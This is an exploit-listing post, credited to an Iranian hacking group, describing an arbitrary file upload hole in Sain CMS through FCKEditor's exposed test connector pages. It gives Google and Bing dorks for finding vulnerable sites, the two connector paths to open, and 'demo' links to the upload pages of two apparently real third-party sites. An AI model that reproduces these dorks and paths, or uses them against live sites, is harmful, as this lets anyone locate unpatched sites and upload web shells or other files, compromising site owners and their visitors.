facebook facebook twitter rss

Sain CMS File Upload Vulnerability (FCKEditor)

Author: Iran Cyber Security Group , Published: 08-06-2015
# Exploit Title : Sain CMS File Upload Vulnerability (FCKEditor)

# Date : 07/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : WH!T3 W01F

# Contact : whit3_w01f@att.net

# Software Link : sain.ir

# Version : All Versions

# Category : Web Application Bugs

# Google Dork : site:.ir intext:Powered By SAIN

# Bing Dork : "Powered By SAIN"

# Tested On : Windows

# Home : Iran-Cyber.Org

PoC :

Exploit 1 : site.com/html/js/editor/fckeditor/editor/filemanager/connectors/test.html

Exploit 2 : site.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

Demo :

http://yazdp.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

http://yfajr.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

# Thanks To : root3r - KamraN HellisH - MOHAMAD-NOFOZI - Sheytan Azzam - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group

Like us on Facebook :